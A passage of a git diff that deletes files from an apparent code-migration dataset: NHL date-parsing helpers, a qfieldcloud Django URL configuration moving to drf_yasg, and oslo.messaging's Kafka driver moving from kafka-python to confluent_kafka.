'US/Eastern', - 'PACIFIC': 'US/Pacific', - 'MOUNTAIN': 'US/Mountain'} - if target in common: - target = common[target] - - return target - - def _ISODateToEasternTime(self, iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. 
(The default human-readable format - for the listing of games).""" - date = pendulum.parse(iso).in_tz('{}'.format('US/Eastern')) - time = date.format('h:mm A zz') - return "{}".format(time) # Strip the seconds - - def _stripDateSeparators(self, date_string): - return date_string.replace('-', '') - - def _EnglishDateToDate(self, date): - """Convert a human-readable like 'yesterday' to a datetime object - and return a 'YYYYMMDD' string.""" - if date == "lastweek": - day_delta = -7 - elif date == "yesterday": - day_delta = -1 - elif date == "today" or date =="tonight": - day_delta = 0 - elif date == "tomorrow": - day_delta = 1 - elif date == "nextweek": - day_delta = 7 - elif date[:3] == 'sun': - date_string = pendulum.now('US/Pacific').next(pendulum.SUNDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'mon': - date_string = pendulum.now('US/Pacific').next(pendulum.MONDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'tue': - date_string = pendulum.now('US/Pacific').next(pendulum.TUESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'wed': - date_string = pendulum.now('US/Pacific').next(pendulum.WEDNESDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'thu': - date_string = pendulum.now('US/Pacific').next(pendulum.THURSDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'fri': - date_string = pendulum.now('US/Pacific').next(pendulum.FRIDAY).format('YYYY-MM-DD') - return date_string - elif date[:3] == 'sat': - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string - date_string = self._pacificTimeNow().add(days=day_delta).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. 
Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" - - error_string = 'Incorrect date format, should be YYYY-MM-DD' - - if date is None: - return None - - if date in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) - - if date.isdigit(): - try: - date = pendulum.from_format(date, 'YYYYMMDD').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: - parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: - year = '/' + str(pendulum.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: - date = '{}/{}/{}'.format(date.split('/')[0], date.split('/')[1], '20{}'.format(date.split('/')[2])) - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: - date = pendulum.from_format(date, 'MM/DD/YYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: - if date.title() in ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']: - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() - year = str(pendulum.datetime.now().year) - date += year - try: - date = pendulum.from_format(date, 'DDMMMYYYY').strftime('%Y-%m-%d') - except: - date = pendulum.from_format(date, 'MMMDDYYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" - else: - return None - - return date - -Class = NHL - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff deleted file mode 100644 index 9c5b6fe..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.diff +++ /dev/null @@ -1,49 +0,0 @@ -diff --git a/web-app/qfieldcloud/urls.py b/web-app/qfieldcloud/urls.py - index 4d662bf43a1f7e066b0eca3d90c5ff11dd04c061..4377d67a99ed8b6680276cbf4585cbac18439b37 100644 - --- a/web-app/qfieldcloud/urls.py - +++ b/web-app/qfieldcloud/urls.py -@@ -14,14 +14,41 @@ Including another URLconf - 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls')) - """ - from django.contrib import admin --from django.urls import path, include --from rest_framework_swagger.views import get_swagger_view -+from django.urls import path, re_path, include -+ -+from rest_framework import permissions -+from drf_yasg.views import get_schema_view -+from drf_yasg import openapi -+ -+ -+schema_view = get_schema_view( -+ openapi.Info( -+ title="QFieldcloud REST API", -+ default_version='v1', -+ description="Test description", -+ terms_of_service="https://", -+ contact=openapi.Contact(email="info@opengis.ch"), -+ license=openapi.License(name="License"), -+ ), -+ public=True, -+ permission_classes=(permissions.AllowAny,), -+) - - urlpatterns = [ -+ -+ re_path(r'^swagger(?P<format>\.json|\.yaml)$', -+ schema_view.without_ui(cache_timeout=0), -+ name='schema-json'), -+ path('swagger/', -+ schema_view.with_ui('swagger', cache_timeout=0), -+ name='schema-swagger-ui'), -+ path('docs/', -+ schema_view.with_ui('redoc', cache_timeout=0), -+ name='schema-redoc'), -+ - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), -- path('docs/', get_swagger_view(title='QFieldcloud REST API')), - path('auth/', include('rest_framework.urls')), - ] diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py deleted file mode 100644 index 504039a..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.source.py +++ /dev/null @@ -1,27 +0,0 @@ -"""qfieldcloud URL Configuration - -The `urlpatterns` list routes URLs to views. For more information please see: - https://docs.djangoproject.com/en/2.2/topics/http/urls/ -Examples: -Function views - 1. Add an import: from my_app import views - 2. Add a URL to urlpatterns: path('', views.home, name='home') -Class-based views - 1. Add an import: from other_app.views import Home - 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') -Including another URLconf - 1. Import the include() function: from django.urls import include, path - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) -""" -from django.contrib import admin -from django.urls import path, include -from rest_framework_swagger.views import get_swagger_view - -urlpatterns = [ - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), - path('docs/', get_swagger_view(title='QFieldcloud REST API')), - path('auth/', include('rest_framework.urls')), -] diff --git a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py b/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py deleted file mode 100644 index 458512b..0000000 --- a/v1/data/codefile/opengisch@qfieldcloud__4377d67__web-app$qfieldcloud$urls.py.target.py +++ /dev/null @@ -1,54 +0,0 @@ -"""qfieldcloud URL Configuration - -The `urlpatterns` list routes URLs to views. For more information please see: - https://docs.djangoproject.com/en/2.2/topics/http/urls/ -Examples: -Function views - 1. Add an import: from my_app import views - 2.
Add a URL to urlpatterns: path('', views.home, name='home') -Class-based views - 1. Add an import: from other_app.views import Home - 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') -Including another URLconf - 1. Import the include() function: from django.urls import include, path - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) -""" -from django.contrib import admin -from django.urls import path, re_path, include - -from rest_framework import permissions -from drf_yasg.views import get_schema_view -from drf_yasg import openapi - - -schema_view = get_schema_view( - openapi.Info( - title="QFieldcloud REST API", - default_version='v1', - description="Test description", - terms_of_service="https://", - contact=openapi.Contact(email="info@opengis.ch"), - license=openapi.License(name="License"), - ), - public=True, - permission_classes=(permissions.AllowAny,), -) - -urlpatterns = [ - - re_path(r'^swagger(?P\.json|\.yaml)$', - schema_view.without_ui(cache_timeout=0), - name='schema-json'), - path('swagger/', - schema_view.with_ui('swagger', cache_timeout=0), - name='schema-swagger-ui'), - path('docs/', - schema_view.with_ui('redoc', cache_timeout=0), - name='schema-redoc'), - - path('admin/', admin.site.urls), - path('api/v1/auth/registration/', include('rest_auth.registration.urls')), - path('api/v1/auth/', include('rest_auth.urls')), - path('api/v1/', include('qfieldcloud.apps.api.urls')), - path('auth/', include('rest_framework.urls')), -] diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff deleted file mode 100644 index 26a1825..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.diff +++ /dev/null @@ -1,400 +0,0 @@ -diff --git a/oslo_messaging/_drivers/impl_kafka.py b/oslo_messaging/_drivers/impl_kafka.py - index 252844879d9e34c81b1777a92ad4407fab4a6853..5a842ae15582e4eedfb1b2510eaf4a8997701f58 100644 - --- a/oslo_messaging/_drivers/impl_kafka.py - +++ b/oslo_messaging/_drivers/impl_kafka.py -@@ -12,54 +12,30 @@ - # License for the specific language governing permissions and limitations - # under the License. - --# Following code fixes 2 issues with kafka-python and --# The current release of eventlet (0.19.0) does not actually remove --# select.poll [1]. Because of kafka-python.selectors34 selects --# PollSelector instead of SelectSelector [2]. PollSelector relies on --# select.poll, which does not work when eventlet/greenlet is used. This --# bug in evenlet is fixed in the master branch [3], but there's no --# release of eventlet that includes this fix at this point. 
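# --- Illustrative sketch, not part of the recorded patch ---
# The comment above explains why the old kafka-python driver had to
# monkeypatch its selector under eventlet. The rewritten driver sidesteps
# the problem instead: it hands blocking client calls to eventlet's native
# thread pool. A minimal sketch of that pattern, assuming eventlet is
# installed; `blocking_poll` is an invented stand-in for a C-level
# blocking call such as confluent_kafka.Consumer.consume():
import time

from eventlet import tpool


def blocking_poll(timeout):
    # pretend to block in native code for `timeout` seconds
    time.sleep(timeout)
    return []


# tpool.execute runs the callable in a real OS thread, so the blocking
# call cannot starve the green-thread hub while it waits
messages = tpool.execute(blocking_poll, 0.5)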
-- --import json -+import logging - import threading - --import kafka --from kafka.client_async import selectors --import kafka.errors --from oslo_log import log as logging -+import confluent_kafka -+from confluent_kafka import KafkaException -+from oslo_serialization import jsonutils - from oslo_utils import eventletutils --import tenacity -+from oslo_utils import importutils - - from oslo_messaging._drivers import base - from oslo_messaging._drivers import common as driver_common - from oslo_messaging._drivers.kafka_driver import kafka_options --from oslo_messaging._i18n import _LE --from oslo_messaging._i18n import _LW --from oslo_serialization import jsonutils -- --import logging as l --l.basicConfig(level=l.INFO) --l.getLogger("kafka").setLevel(l.WARN) --l.getLogger("stevedore").setLevel(l.WARN) - --if eventletutils.is_monkey_patched('select'): -- # monkeypatch the vendored SelectSelector._select like eventlet does -- # https://github.com/eventlet/eventlet/blob/master/eventlet/green/selectors.py#L32 -- from eventlet.green import select -- selectors.SelectSelector._select = staticmethod(select.select) -- -- # Force to use the select selectors -- KAFKA_SELECTOR = selectors.SelectSelector --else: -- KAFKA_SELECTOR = selectors.DefaultSelector -+if eventletutils.EVENTLET_AVAILABLE: -+ tpool = importutils.try_import('eventlet.tpool') - - LOG = logging.getLogger(__name__) - - - def unpack_message(msg): -+ """Unpack context and msg.""" - context = {} - message = None -- msg = json.loads(msg) -+ msg = jsonutils.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] -@@ -68,7 +44,6 @@ def unpack_message(msg): - - def pack_message(ctxt, msg): - """Pack context into msg.""" -- - if isinstance(ctxt, dict): - context_d = ctxt - else: -@@ -97,25 +72,28 @@ def target_to_topic(target, priority=None, vhost=None): - return concat(".", [target.topic, priority, vhost]) - - --def retry_on_retriable_kafka_error(exc): -- return (isinstance(exc, kafka.errors.KafkaError) and exc.retriable) -+class ConsumerTimeout(KafkaException): -+ pass - - --def with_reconnect(retries=None): -- def decorator(func): -- @tenacity.retry( -- retry=tenacity.retry_if_exception(retry_on_retriable_kafka_error), -- wait=tenacity.wait_fixed(1), -- stop=tenacity.stop_after_attempt(retries), -- reraise=True -- ) -- def wrapper(*args, **kwargs): -- return func(*args, **kwargs) -- return wrapper -- return decorator -+class AssignedPartition(object): -+ """This class is used by the ConsumerConnection to track the -+ assigned partitions. -+ """ -+ def __init__(self, topic, partition): -+ super(AssignedPartition, self).__init__() -+ self.topic = topic -+ self.partition = partition -+ self.skey = '%s %d' % (self.topic, self.partition) -+ -+ def to_dict(self): -+ return {'topic': self.topic, 'partition': self.partition} - - - class Connection(object): -+ """This is the base class for consumer and producer connections for -+ transport attributes. 
-+ """ - - def __init__(self, conf, url): - -@@ -141,7 +119,7 @@ class Connection(object): - self.password = host.password - else: - if self.username != host.username: -- LOG.warning(_LW("Different transport usernames detected")) -+ LOG.warning("Different transport usernames detected") - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) -@@ -152,7 +130,8 @@ class Connection(object): - - - class ConsumerConnection(Connection): -- -+ """This is the class for kafka topic/assigned partition consumer -+ """ - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) -@@ -160,28 +139,59 @@ class ConsumerConnection(Connection): - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group -- self.enable_auto_commit = self.driver_conf.enable_auto_commit -+ self.use_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False -+ self.assignment_dict = dict() -+ -+ def find_assignment(self, topic, partition): -+ """Find and return existing assignment based on topic and partition""" -+ skey = '%s %d' % (topic, partition) -+ return self.assignment_dict.get(skey) -+ -+ def on_assign(self, consumer, topic_partitions): -+ """Rebalance on_assign callback""" -+ assignment = [AssignedPartition(p.topic, p.partition) -+ for p in topic_partitions] -+ self.assignment_dict = {a.skey: a for a in assignment} -+ for t in topic_partitions: -+ LOG.debug("Topic %s assigned to partition %d", -+ t.topic, t.partition) -+ -+ def on_revoke(self, consumer, topic_partitions): -+ """Rebalance on_revoke callback""" -+ self.assignment_dict = dict() -+ for t in topic_partitions: -+ LOG.debug("Topic %s revoked from partition %d", -+ t.topic, t.partition) - -- @with_reconnect() - def _poll_messages(self, timeout): -- messages = self.consumer.poll(timeout * 1000.0) -- messages = [record.value -- for records in messages.values() if records -- for record in records] -- if not messages: -- # NOTE(sileht): really ? you return payload but no messages... -- # simulate timeout to consume message again -- raise kafka.errors.ConsumerNoMoreData() -- -- if not self.enable_auto_commit: -- self.consumer.commit() -+ """Consume messages, callbacks and return list of messages""" -+ msglist = self.consumer.consume(self.max_poll_records, -+ timeout) -+ -+ if ((len(self.assignment_dict) == 0) or (len(msglist) == 0)): -+ raise ConsumerTimeout() -+ -+ messages = [] -+ for message in msglist: -+ if message is None: -+ break -+ a = self.find_assignment(message.topic(), message.partition()) -+ if a is None: -+ LOG.warning(("Message for %s received on unassigned " -+ "partition %d"), -+ message.topic(), message.partition()) -+ else: -+ messages.append(message.value()) -+ -+ if not self.use_auto_commit: -+ self.consumer.commit(asynchronous=False) - - return messages - - def consume(self, timeout=None): -- """Receive up to 'max_fetch_messages' messages. -+ """Receive messages. 
- - :param timeout: poll timeout in seconds - """ -@@ -199,12 +209,14 @@ class ConsumerConnection(Connection): - if self._consume_loop_stopped: - return - try: -+ if eventletutils.is_monkey_patched('thread'): -+ return tpool.execute(self._poll_messages, poll_timeout) - return self._poll_messages(poll_timeout) -- except kafka.errors.ConsumerNoMoreData as exc: -+ except ConsumerTimeout as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: -- LOG.exception(_LE("Failed to consume messages")) -+ LOG.exception("Failed to consume messages") - return - - def stop_consuming(self): -@@ -215,21 +227,25 @@ class ConsumerConnection(Connection): - self.consumer.close() - self.consumer = None - -- @with_reconnect() - def declare_topic_consumer(self, topics, group=None): -- self.consumer = kafka.KafkaConsumer( -- *topics, group_id=(group or self.group_id), -- enable_auto_commit=self.enable_auto_commit, -- bootstrap_servers=self.hostaddrs, -- max_partition_fetch_bytes=self.max_fetch_bytes, -- max_poll_records=self.max_poll_records, -- security_protocol=self.security_protocol, -- sasl_mechanism=self.sasl_mechanism, -- sasl_plain_username=self.username, -- sasl_plain_password=self.password, -- ssl_cafile=self.ssl_cafile, -- selector=KAFKA_SELECTOR -- ) -+ conf = { -+ 'bootstrap.servers': ",".join(self.hostaddrs), -+ 'group.id': (group or self.group_id), -+ 'enable.auto.commit': self.use_auto_commit, -+ 'max.partition.fetch.bytes': self.max_fetch_bytes, -+ 'security.protocol': self.security_protocol, -+ 'sasl.mechanism': self.sasl_mechanism, -+ 'sasl.username': self.username, -+ 'sasl.password': self.password, -+ 'ssl.ca.location': self.ssl_cafile, -+ 'enable.partition.eof': False, -+ 'default.topic.config': {'auto.offset.reset': 'latest'} -+ } -+ LOG.debug("Subscribing to %s as %s", topics, (group or self.group_id)) -+ self.consumer = confluent_kafka.Consumer(conf) -+ self.consumer.subscribe(topics, -+ on_assign=self.on_assign, -+ on_revoke=self.on_revoke) - - - class ProducerConnection(Connection): -@@ -242,6 +258,20 @@ class ProducerConnection(Connection): - self.producer = None - self.producer_lock = threading.Lock() - -+ def _produce_message(self, topic, message): -+ while True: -+ try: -+ self.producer.produce(topic, message) -+ except KafkaException as e: -+ LOG.error("Produce message failed: %s" % str(e)) -+ except BufferError: -+ LOG.debug("Produce message queue full, waiting for deliveries") -+ self.producer.poll(0.5) -+ continue -+ break -+ -+ self.producer.poll(0) -+ - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. 
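# --- Illustrative sketch, not part of the recorded patch ---
# The _produce_message loop added in the hunk above handles
# confluent-kafka's local-queue backpressure: produce() raises BufferError
# when the client's buffer is full, so the loop polls to drain delivery
# callbacks and then retries. A standalone sketch of the same pattern;
# the broker address and topic name are invented:
import confluent_kafka

producer = confluent_kafka.Producer({'bootstrap.servers': 'localhost:9092'})


def produce_with_backpressure(topic, payload):
    while True:
        try:
            producer.produce(topic, payload)
        except BufferError:
            producer.poll(0.5)  # serve deliveries to free buffer space
            continue
        break
    producer.poll(0)  # serve any completed delivery callbacks


produce_with_backpressure('notifications.info', b'{"event": "example"}')
producer.flush()  # block until everything queued has been delivered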
- -@@ -254,16 +284,11 @@ class ProducerConnection(Connection): - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - -- @with_reconnect(retries=retry) -- def wrapped_with_reconnect(): -- self._ensure_producer() -- # NOTE(sileht): This returns a future, we can use get() -- # if we want to block like other driver -- future = self.producer.send(topic, message) -- future.get() -- - try: -- wrapped_with_reconnect() -+ self._ensure_producer() -+ if eventletutils.is_monkey_patched('thread'): -+ return tpool.execute(self._produce_message, topic, message) -+ return self._produce_message(topic, message) - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection -@@ -276,7 +301,10 @@ class ProducerConnection(Connection): - def _close_producer(self): - with self.producer_lock: - if self.producer: -- self.producer.close() -+ try: -+ self.producer.flush() -+ except KafkaException: -+ LOG.error("Flush error during producer close") - self.producer = None - - def _ensure_producer(self): -@@ -285,16 +313,17 @@ class ProducerConnection(Connection): - with self.producer_lock: - if self.producer: - return -- self.producer = kafka.KafkaProducer( -- bootstrap_servers=self.hostaddrs, -- linger_ms=self.linger_ms, -- batch_size=self.batch_size, -- security_protocol=self.security_protocol, -- sasl_mechanism=self.sasl_mechanism, -- sasl_plain_username=self.username, -- sasl_plain_password=self.password, -- ssl_cafile=self.ssl_cafile, -- selector=KAFKA_SELECTOR) -+ conf = { -+ 'bootstrap.servers': ",".join(self.hostaddrs), -+ 'linger.ms': self.linger_ms, -+ 'batch.num.messages': self.batch_size, -+ 'security.protocol': self.security_protocol, -+ 'sasl.mechanism': self.sasl_mechanism, -+ 'sasl.username': self.username, -+ 'sasl.password': self.password, -+ 'ssl.ca.location': self.ssl_cafile -+ } -+ self.producer = confluent_kafka.Producer(conf) - - - class OsloKafkaMessage(base.RpcIncomingMessage): -@@ -303,13 +332,13 @@ class OsloKafkaMessage(base.RpcIncomingMessage): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): -- LOG.warning(_LW("requeue is not supported")) -+ LOG.warning("requeue is not supported") - - def reply(self, reply=None, failure=None): -- LOG.warning(_LW("reply is not supported")) -+ LOG.warning("reply is not supported") - - def heartbeat(self): -- LOG.warning(_LW("heartbeat is not supported")) -+ LOG.warning("heartbeat is not supported") - - - class KafkaListener(base.PollStyleListener): -@@ -347,8 +376,9 @@ class KafkaListener(base.PollStyleListener): - - - class KafkaDriver(base.BaseDriver): -- """Note: Current implementation of this driver is experimental. -- We will have functional and/or integrated testing enabled for this driver. -+ """Kafka Driver -+ -+ Note: Current implementation of this driver is experimental. 
- """ - - def __init__(self, conf, url, default_exchange=None, -@@ -366,6 +396,7 @@ class KafkaDriver(base.BaseDriver): - for c in self.listeners: - c.close() - self.listeners = [] -+ LOG.info("Kafka messaging driver shutdown") - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): -@@ -414,9 +445,9 @@ class KafkaDriver(base.BaseDriver): - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) -- topics = set() -+ topics = [] - for target, priority in targets_and_priorities: -- topics.add(target_to_topic(target, priority)) -+ topics.append(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py deleted file mode 100644 index 20b97ca..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.source.py +++ /dev/null @@ -1,425 +0,0 @@ -# Copyright (C) 2015 Cisco Systems, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); you may -# not use this file except in compliance with the License. You may obtain -# a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT -# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the -# License for the specific language governing permissions and limitations -# under the License. - -# Following code fixes 2 issues with kafka-python and -# The current release of eventlet (0.19.0) does not actually remove -# select.poll [1]. Because of kafka-python.selectors34 selects -# PollSelector instead of SelectSelector [2]. PollSelector relies on -# select.poll, which does not work when eventlet/greenlet is used. This -# bug in evenlet is fixed in the master branch [3], but there's no -# release of eventlet that includes this fix at this point. 
- -import json -import threading - -import kafka -from kafka.client_async import selectors -import kafka.errors -from oslo_log import log as logging -from oslo_utils import eventletutils -import tenacity - -from oslo_messaging._drivers import base -from oslo_messaging._drivers import common as driver_common -from oslo_messaging._drivers.kafka_driver import kafka_options -from oslo_messaging._i18n import _LE -from oslo_messaging._i18n import _LW -from oslo_serialization import jsonutils - -import logging as l -l.basicConfig(level=l.INFO) -l.getLogger("kafka").setLevel(l.WARN) -l.getLogger("stevedore").setLevel(l.WARN) - -if eventletutils.is_monkey_patched('select'): - # monkeypatch the vendored SelectSelector._select like eventlet does - # https://github.com/eventlet/eventlet/blob/master/eventlet/green/selectors.py#L32 - from eventlet.green import select - selectors.SelectSelector._select = staticmethod(select.select) - - # Force to use the select selectors - KAFKA_SELECTOR = selectors.SelectSelector -else: - KAFKA_SELECTOR = selectors.DefaultSelector - -LOG = logging.getLogger(__name__) - - -def unpack_message(msg): - context = {} - message = None - msg = json.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] - return context, message - - -def pack_message(ctxt, msg): - """Pack context into msg.""" - - if isinstance(ctxt, dict): - context_d = ctxt - else: - context_d = ctxt.to_dict() - msg['_context'] = context_d - - msg = driver_common.serialize_msg(msg) - - return msg - - -def concat(sep, items): - return sep.join(filter(bool, items)) - - -def target_to_topic(target, priority=None, vhost=None): - """Convert target into topic string - - :param target: Message destination target - :type target: oslo_messaging.Target - :param priority: Notification priority - :type priority: string - :param priority: Notification vhost - :type priority: string - """ - return concat(".", [target.topic, priority, vhost]) - - -def retry_on_retriable_kafka_error(exc): - return (isinstance(exc, kafka.errors.KafkaError) and exc.retriable) - - -def with_reconnect(retries=None): - def decorator(func): - @tenacity.retry( - retry=tenacity.retry_if_exception(retry_on_retriable_kafka_error), - wait=tenacity.wait_fixed(1), - stop=tenacity.stop_after_attempt(retries), - reraise=True - ) - def wrapper(*args, **kwargs): - return func(*args, **kwargs) - return wrapper - return decorator - - -class Connection(object): - - def __init__(self, conf, url): - - self.driver_conf = conf.oslo_messaging_kafka - self.security_protocol = self.driver_conf.security_protocol - self.sasl_mechanism = self.driver_conf.sasl_mechanism - self.ssl_cafile = self.driver_conf.ssl_cafile - self.url = url - self.virtual_host = url.virtual_host - self._parse_url() - - def _parse_url(self): - self.hostaddrs = [] - self.username = None - self.password = None - - for host in self.url.hosts: - # NOTE(ansmith): connections and failover are transparently - # managed by the client library. 
Credentials will be - # selectd from first host encountered in transport_url - if self.username is None: - self.username = host.username - self.password = host.password - else: - if self.username != host.username: - LOG.warning(_LW("Different transport usernames detected")) - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) - - def reset(self): - """Reset a connection so it can be used again.""" - pass - - -class ConsumerConnection(Connection): - - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) - self.consumer = None - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group - self.enable_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False - - @with_reconnect() - def _poll_messages(self, timeout): - messages = self.consumer.poll(timeout * 1000.0) - messages = [record.value - for records in messages.values() if records - for record in records] - if not messages: - # NOTE(sileht): really ? you return payload but no messages... - # simulate timeout to consume message again - raise kafka.errors.ConsumerNoMoreData() - - if not self.enable_auto_commit: - self.consumer.commit() - - return messages - - def consume(self, timeout=None): - """Receive up to 'max_fetch_messages' messages. - - :param timeout: poll timeout in seconds - """ - - def _raise_timeout(exc): - raise driver_common.Timeout(str(exc)) - - timer = driver_common.DecayingTimer(duration=timeout) - timer.start() - - poll_timeout = (self.consumer_timeout if timeout is None - else min(timeout, self.consumer_timeout)) - - while True: - if self._consume_loop_stopped: - return - try: - return self._poll_messages(poll_timeout) - except kafka.errors.ConsumerNoMoreData as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: - LOG.exception(_LE("Failed to consume messages")) - return - - def stop_consuming(self): - self._consume_loop_stopped = True - - def close(self): - if self.consumer: - self.consumer.close() - self.consumer = None - - @with_reconnect() - def declare_topic_consumer(self, topics, group=None): - self.consumer = kafka.KafkaConsumer( - *topics, group_id=(group or self.group_id), - enable_auto_commit=self.enable_auto_commit, - bootstrap_servers=self.hostaddrs, - max_partition_fetch_bytes=self.max_fetch_bytes, - max_poll_records=self.max_poll_records, - security_protocol=self.security_protocol, - sasl_mechanism=self.sasl_mechanism, - sasl_plain_username=self.username, - sasl_plain_password=self.password, - ssl_cafile=self.ssl_cafile, - selector=KAFKA_SELECTOR - ) - - -class ProducerConnection(Connection): - - def __init__(self, conf, url): - - super(ProducerConnection, self).__init__(conf, url) - self.batch_size = self.driver_conf.producer_batch_size - self.linger_ms = self.driver_conf.producer_batch_timeout * 1000 - self.producer = None - self.producer_lock = threading.Lock() - - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. 
- - :param topic: String of the topic - :param ctxt: context for the messages - :param msg: messages for publishing - :param retry: the number of retry - """ - retry = retry if retry >= 0 else None - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - - @with_reconnect(retries=retry) - def wrapped_with_reconnect(): - self._ensure_producer() - # NOTE(sileht): This returns a future, we can use get() - # if we want to block like other driver - future = self.producer.send(topic, message) - future.get() - - try: - wrapped_with_reconnect() - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection - self._close_producer() - raise - - def close(self): - self._close_producer() - - def _close_producer(self): - with self.producer_lock: - if self.producer: - self.producer.close() - self.producer = None - - def _ensure_producer(self): - if self.producer: - return - with self.producer_lock: - if self.producer: - return - self.producer = kafka.KafkaProducer( - bootstrap_servers=self.hostaddrs, - linger_ms=self.linger_ms, - batch_size=self.batch_size, - security_protocol=self.security_protocol, - sasl_mechanism=self.sasl_mechanism, - sasl_plain_username=self.username, - sasl_plain_password=self.password, - ssl_cafile=self.ssl_cafile, - selector=KAFKA_SELECTOR) - - -class OsloKafkaMessage(base.RpcIncomingMessage): - - def __init__(self, ctxt, message): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): - LOG.warning(_LW("requeue is not supported")) - - def reply(self, reply=None, failure=None): - LOG.warning(_LW("reply is not supported")) - - def heartbeat(self): - LOG.warning(_LW("heartbeat is not supported")) - - -class KafkaListener(base.PollStyleListener): - - def __init__(self, conn): - super(KafkaListener, self).__init__() - self._stopped = threading.Event() - self.conn = conn - self.incoming_queue = [] - - # FIXME(sileht): We do a first poll to ensure we topics 